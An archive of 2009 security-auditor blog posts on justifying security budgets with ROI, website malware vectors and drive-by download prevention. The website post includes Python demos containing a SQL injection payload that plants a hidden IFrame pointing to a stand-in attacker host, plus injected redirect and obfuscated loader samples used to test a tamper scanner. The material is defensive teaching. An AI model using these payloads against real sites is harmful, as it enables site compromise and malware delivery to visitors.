ERE Information Security Auditors

Archive for October, 2009

Calculating ROI to Justify Information Security and Compliance Budgets

Tuesday, October 27th, 2009

Executive Summary
The way to get the executive team to pay attention to a new initiative is to provide a quality ROI for it. If the Board of Directors cannot understand the needs of the various departments, the only way to its pocketbook is to present it with a bottom-line return on its investment.

When a security budget is being procured, executives are often less than forthcoming because of the lack of information they receive from department heads. Boards of Directors and executive teams respond most favourably to requests for information security budgets that are cost-justified with a simple ROI business case.

The business case needs to show specifically how the potential costs of liability arising from security breaches can be minimized by implementing a sound security infrastructure. The evidence of those risks can be obtained by having a third party perform a security audit.

Using an ROI to cost-justify a security budget rests on the same premise as buying insurance for commodities like office furniture and computers. The difference is that if a security breach occurs because the proper protection procedures were not implemented, the associated costs far outweigh the cost of replacing furniture.

The potential liabilities, such as loss of production and loss of reputation, are translated into actual dollars in the ROI. The security budget is then set as a small percentage of the cost of the potential losses and applied to preventative measures.

As such, this ROI is really a comparison of the cost of avoiding the liability against the potential cost of the liability itself. This is the same methodology used to calculate the financial benefit of insuring commodities such as office buildings, furniture and computers. [1]

Since the cost of a security infrastructure often falls within about the same price ratio as commodity insurance, one would think this cost justification would be an easy sell to an executive committee.

It often is, particularly when the business risks identified in the business case rest on hard evidence of actual security risks. Actual security risks are identified by evidentiary security audits, performed by impartial third parties with expertise in identifying both technical and policy risks.

[1] Typical annual insurance rates for commodities are about 1.5% – 2.5% of asset replacement cost. The author has observed (over many business cases) that annual security budgets can similarly be about 2% – 4% of potential security breach related costs.

My next blog will focus on the Methodology of Calculating ROI.

Have a secure week.

Regards, Ron Lepofsky, B.A.Sc. (Mech Eng), CISSP

ERE Information Security Auditors. www.ere-security.ca


Malware Vectors and Remediation for Web Sites

Monday, October 19th, 2009

In last week’s blog I discussed the mitigation steps recommended for end users to protect themselves from malware in general and from drive-by malware in particular.

This week I will identify some of the most common (popular) technical vectors by which malware is planted on web sites, and how web site owners can protect their sites.

Technical Malware Vectors

  • SQL Injection Attack – exploits application-layer input handling flaws to run attacker-chosen SQL: reading or altering the database directly, or writing script and IFrame tags into stored content that the site later renders into its pages.
  • JavaScript Injection Attack – malicious script inserted into the pages the site serves, frequently delivered as the payload of an SQL injection or through poor input validation; the injected script typically loads IFrames or further active code from an attacker-controlled host.
  • IFrame Injection Attack – a hidden IFrame (zero width and height, or styled invisible) inserted into the web page that silently loads an exploit page from another server, often due to poor input data validation.
  • Stolen FTP Credentials Attack – stolen FTP credentials for the web site are used to log in and modify site files directly, bypassing the application altogether.
  • Server Application Code Vulnerabilities – poorly written or inadequately tested server-side code.
  • Redirect Injection Attack – injected code or configuration (a meta refresh tag, a script that changes the page location, or a web server rewrite rule) that sends visitors to a web server of the attacker’s choice.
  • Malvertising – malicious advertisements served through third-party ad networks deliver attack code to visitors even when the publisher’s own site is clean. Areas that accept user-generated content carry the same risk of serving code the site owner never wrote.
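The following Python script is an added illustration of the first three vectors, not code from the original post. It builds a tiny SQLite-backed site with a comment feature (an assumption of the example) and shows how a comment form that concatenates input into SQL lets a stacked UPDATE write a hidden IFrame into every page body, and how bound parameters plus HTML escaping of user-contributed content close both holes. The table names and the placeholder host attacker.invalid are the example’s own.

```python
import html
import sqlite3

# Constructed payload, modelled on the mass SQL injection campaigns of the
# period: a stacked UPDATE that appends a hidden IFrame to every page body.
# The host is a placeholder and resolves nowhere.
IFRAME = '<iframe src="http://attacker.invalid/drop" width="0" height="0"></iframe>'
PAYLOAD = "Nice site'); UPDATE pages SET body = body || '" + IFRAME + "'; --"


def make_site_db():
    """Constructed sample site: one page, a comments table, nothing else."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE pages (title TEXT PRIMARY KEY, body TEXT);"
        "CREATE TABLE comments (page TEXT, text TEXT);"
        "INSERT INTO pages VALUES ('home', '<h1>Welcome</h1>');"
    )
    return conn


def add_comment_vulnerable(conn, page, text):
    """Concatenates user input into SQL and runs it through executescript(),
    which, like many database drivers, accepts stacked statements. Anything
    after a closing quote in 'text' becomes SQL of the attacker's choosing."""
    sql = "INSERT INTO comments VALUES ('%s', '%s');" % (page, text)
    conn.executescript(sql)


def add_comment_safe(conn, page, text):
    """Same insert with bound parameters: the input is data, never SQL."""
    conn.execute("INSERT INTO comments VALUES (?, ?)", (page, text))
    conn.commit()


def page_body(conn, title):
    row = conn.execute("SELECT body FROM pages WHERE title = ?", (title,)).fetchone()
    return row[0] if row else ""


def page_comments(conn, page):
    return [r[0] for r in conn.execute("SELECT text FROM comments WHERE page = ?", (page,))]


def render_vulnerable(body, comments):
    """Site-authored body is HTML by design; user comments are dropped in raw."""
    return body + "<ul>" + "".join("<li>%s</li>" % c for c in comments) + "</ul>"


def render_safe(body, comments):
    """Same page, but user comments are HTML-escaped so any tags stay inert."""
    return body + "<ul>" + "".join("<li>%s</li>" % html.escape(c) for c in comments) + "</ul>"


def serve_vulnerable(payload=PAYLOAD):
    """Vulnerable path: the injected UPDATE lands in the pages table and the
    IFrame is served to every later visitor of the home page."""
    conn = make_site_db()
    add_comment_vulnerable(conn, "home", payload)
    return render_vulnerable(page_body(conn, "home"), page_comments(conn, "home"))


def serve_safe(payload=PAYLOAD):
    """Hardened path: the payload is stored as an ordinary comment string and
    rendered escaped; the pages table is untouched."""
    conn = make_site_db()
    add_comment_safe(conn, "home", payload)
    return render_safe(page_body(conn, "home"), page_comments(conn, "home"))


if __name__ == "__main__":
    print(serve_vulnerable())
    print(serve_safe())
```

Note that parameterization alone does not help once the database has already been tampered with, and output escaping alone does not stop the UPDATE; the two measures address different vectors and are both needed, alongside the integrity checks described below.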

Mitigation Steps for Web Site Owners

  • Incorporate security into application development and database access at the design stage.  Do not treat application security as a bolt-on or afterthought. Place particular emphasis on data input fields.
  • Thoroughly test all data input fields and the validation applied to them.  Have all user input and user contribution fields audited by internal audit or by a group other than the developers.
  • Update and patch the Java Virtual Machine (JVM) and Java Development Kit (JDK).
  • Ensure the integrity of any third-party tools used to manage or embellish the web site, even seemingly innocuous apps like traffic counters.
  • Constantly look for unauthorized changes in web site code, such as strings that cause URL redirects.  Employ tools that identify unauthorized changes in code.
  • Update and patch web server software.
  • Harden the web server platform.  Eliminate all unnecessary accounts and privileges, restrict access, and vigilantly monitor the logs for attempted but failed access, attempted unauthorized access, and of course successful unauthorized access.
  • Consider deploying a second layer of anti-malware monitoring and diagnostic technology specifically designed for web site security, with the ability to block attack attempts, log attempted and successful attacks, and generate reports and alerts.
  • Identify and remedy all network vulnerabilities in the infrastructure that houses the web site, its platform, and of course its Internet access.
  • Have an impartial set of eyes review all aspects of network security, including architecture (isolation of the web site on a DMZ, etc.), policies and the degree of compliance with them, the security architecture and how effectively it is used, event log monitoring, and, at the risk of repetition, timely and consistent upgrades and patching.
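The step of looking for unauthorized changes in site code can be automated with a baseline of file hashes plus a scan of every new or changed file for the signatures the vectors list describes. The Python below is an added example, not a tool from the original post or from ERE. It builds a constructed site tree, records a SHA-256 baseline, simulates an attacker with the site’s FTP credentials appending a hidden IFrame, a rewrite-rule redirect and an obfuscated “counter” script, and reports what changed and why it looks suspicious. The signature patterns, file names and the host attacker.invalid are assumptions of the example.

```python
import hashlib
import os
import re
import tempfile

# Signatures typical of injected content on compromised sites; each entry is a
# label and a compiled regex. Constructed for this example; extend for your site.
SUSPICIOUS = [
    ("hidden iframe", re.compile(r'<iframe[^>]*(width="?0\b|height="?0\b|display:\s*none)', re.I)),
    ("obfuscated script", re.compile(r'(eval|document\.write)\s*\(\s*unescape\s*\(', re.I)),
    ("meta refresh redirect", re.compile(r'<meta[^>]+http-equiv=["\']?refresh', re.I)),
    ("htaccess redirect", re.compile(r'^\s*RewriteRule\s.*\shttps?://', re.I | re.M)),
    ("script redirect", re.compile(r'location(\.href)?\s*=\s*["\']https?://', re.I)),
]


def snapshot(root):
    """Map every file under root (relative path) to its SHA-256 digest."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                digests[os.path.relpath(path, root)] = hashlib.sha256(f.read()).hexdigest()
    return digests


def diff_snapshots(baseline, current):
    """Return sorted lists of (added, removed, modified) relative paths."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return added, removed, modified


def scan_text(text):
    """Labels of every suspicious signature found in the text, in SUSPICIOUS order."""
    return [label for label, rx in SUSPICIOUS if rx.search(text)]


def audit(root, baseline):
    """Diff the tree against the baseline and scan each new or changed file.
    Unchanged files are trusted on the strength of the baseline hash."""
    current = snapshot(root)
    added, removed, modified = diff_snapshots(baseline, current)
    findings = {}
    for rel in added + modified:
        with open(os.path.join(root, rel), "rb") as f:
            hits = scan_text(f.read().decode("utf-8", errors="replace"))
        if hits:
            findings[rel] = hits
    return {"added": added, "removed": removed, "modified": modified, "findings": findings}


def _write(root, rel, text, mode="w"):
    with open(os.path.join(root, rel), mode) as f:
        f.write(text)


def demo():
    """Constructed site tree: take a clean baseline, then simulate three
    injections of the kinds listed in the post and audit the result."""
    root = tempfile.mkdtemp()
    _write(root, "index.html", "<html><body><h1>Welcome</h1></body></html>\n")
    _write(root, ".htaccess", "Options -Indexes\n")
    _write(root, "about.html", "<html><body>About us</body></html>\n")
    baseline = snapshot(root)
    # An attacker holding the site's FTP credentials appends a hidden IFrame ...
    _write(root, "index.html",
           '<iframe src="http://attacker.invalid/x" width="0" height="0"></iframe>\n', "a")
    # ... adds a conditional rewrite that sends search-engine visitors elsewhere ...
    _write(root, ".htaccess", "RewriteEngine On\nRewriteCond %{HTTP_REFERER} google\n"
           "RewriteRule .* http://attacker.invalid/r [R,L]\n", "a")
    # ... and drops an obfuscated "traffic counter" script.
    _write(root, "counter.js",
           'document.write(unescape("%3Cscript src=%22http://attacker.invalid/c.js%22%3E%3C/script%3E"))\n')
    return audit(root, baseline)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Keep the baseline off the web server and run the audit from another host against a copy of the site pulled over a read-only channel; an attacker with FTP access to the site could otherwise edit the baseline along with the pages.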

Have a secure week.

Regards

Ron Lepofsky, B.A.Sc. (Mech Eng), CISSP

ERE Information Security Auditors

www.ere-security.ca

Preventative Measures for Drive-By Malware

Monday, October 12th, 2009

My last blog discussed the financial motivation for creating malware.  This article identifies preventative measures that end users (and, in the next article, web site managers) can implement to protect all concerned from the dangers of drive-by malware.

As a brief reminder, a drive-by download takes one of two forms:

A download the user indirectly authorized by clicking on a link, or by being redirected to a misleading link, without understanding the consequences.  For instance the user may be installing an unknown ActiveX component or Java applet.  The damage occurs when the download contains spyware, a computer virus or any other kind of malware.

A download of malware through exploitation of a web browser, e-mail client or operating system bug, without any user intervention whatsoever.  Web sites that exploited the Windows Metafile (WMF) vulnerability are an example of drive-by downloads of this sort.

Common drive-by downloads happen when a user:

  • Visits a web site.
  • Views an e-mail message.
  • Clicks on a deceptive pop-up window believing it to be, for instance, a bona fide message, when in fact they have just initiated a malicious software download.

Mitigation Steps Recommended for the End User

In order from simple to more complex:

  • Do not store unencrypted personal information on a workstation.
  • Use strong passwords for encryption, for access to the workstation, and for any services or devices that can be reached from the workstation.
  • Do not use the same password for multiple devices or services.
  • Change passwords regularly.
  • Do not open e-mail from unknown senders.
  • Never click on attachments or links embedded in e-mails, even when they come from friends.  A friend may forward an attachment or link that, unknown to them, is infected with malware.
  • Do not visit unknown web sites that could be potentially dangerous.  If in doubt about a site’s reputation, check it against one or more of the published blacklists of malicious web sites.
  • Do not assume that the web site of a small organization is less prone to malware.  The trend is for criminals to install malware on small and medium-sized sites as well.
  • Verify the certificate of any web site on which you will divulge confidential information or perform a financial transaction: it should be valid, issued by a trusted authority and match the site’s name.  Where possible, I recommend doing the transaction by telephone unless you are highly confident in the identity and reputation of the web site.
  • Install an anti-malware package on each workstation.
  • Use a browser with anti-malware features.
  • Judiciously apply security patches to:
    • Anti-malware software.
    • Anti-malware features of the browser.
    • Operating system software.
    • All other application software.
  • At the very least, install a personal firewall in front of any Internet-facing workstation.

My Next Blog Article

Next week I will identify some of the technical vectors used to install malware on web sites and the preventative and restorative steps web site owners can implement.

Have a secure week.

Regards,

Ron Lepofsky,

ERE Information Security Auditors.


Monday, October 5th, 2009

Copyrights © 2007-2008. All rights reserved.